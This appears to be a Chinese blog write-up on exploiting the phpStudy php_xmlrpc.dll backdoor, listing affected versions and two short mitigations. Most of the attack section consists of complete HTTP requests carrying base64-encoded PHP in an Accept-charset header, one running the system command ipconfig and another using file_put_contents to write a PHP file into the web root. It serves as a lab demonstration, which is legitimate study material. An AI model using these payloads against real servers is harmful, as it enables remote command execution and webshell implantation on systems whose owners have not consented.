phpstudy后门引发的渗透测试

问题概述

有问题的版本:
默认路劲 C:\phpStudy\PHPTutorial\php\php-5.2.17\ext\

PHPStudyphp版本ext扩展文件夹下
phpStudy20180211php5.4.45 和 php5.2.17php_xmlrpc.dll
phpStudy20161103php5.4.45 和 php5.2.17php_xmlrpc.dll

后门所在位置:
image-20191104165448398.png

注:使用记事本打开 php_xmlrpc.dll文件

Getshell

我们通过burp抓包软件来利用后门...

没有修改的请求头信息

GET / HTTP/1.1
Host: 192.168.1.131
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

image-20191104170224539.png

修改后:

GET / HTTP/1.1
Host: 192.168.1.131
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip,deflate                 # deflate前面的空格去掉
Accept-charset:c3lzdGVtKCdpcGNvbmZpZycpOw==   # 添加新字段,值需要base64编码
Accept-Language: zh-CN,zh;q=0.9
Connection: close

执行系统命令,base64编码为:c3lzdGVtKCdpcGNvbmZpZycpOw==
解码为:system('ipconfig');
image-20191104170721857.png

phpinfo

image-20191104170830577.png

写一句话木马,利用 file_put_contents()函数
file_put_contents("C:\phpStudy\PHPTutorial\WWW\info.php","<?php phpinfo(); ?>");
image-20191104171240547.png

GET / HTTP/1.1
Host: 192.168.1.131
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip,deflate
Accept-charset:ZmlsZV9wdXRfY29udGVudHMoIkM6XHBocFN0dWR5XFBIUFR1dG9yaWFsXFdXV1xpbmZvLnBocCIsIjw/cGhwIHBocGluZm8oKTsgPz4iKTs=
Accept-Language: zh-CN,zh;q=0.9
Connection: close

image-20191104171403855.png

防护措施

1.修改php.ini配置文件,注释这个扩展文件
image-20191104171619733.png

2.使用最新的phpstudy

总结

待更...

参考链接

https://www.freebuf.com/articles/others-articles/215406.html

本文链接:

https://www.betao.cn/archives/phpstudy.html
1 + 4 =
1 评论
    idkdjsMZ BrowserAndroid N
    2019年11月05日 回复

    dhdjksmxbcvgd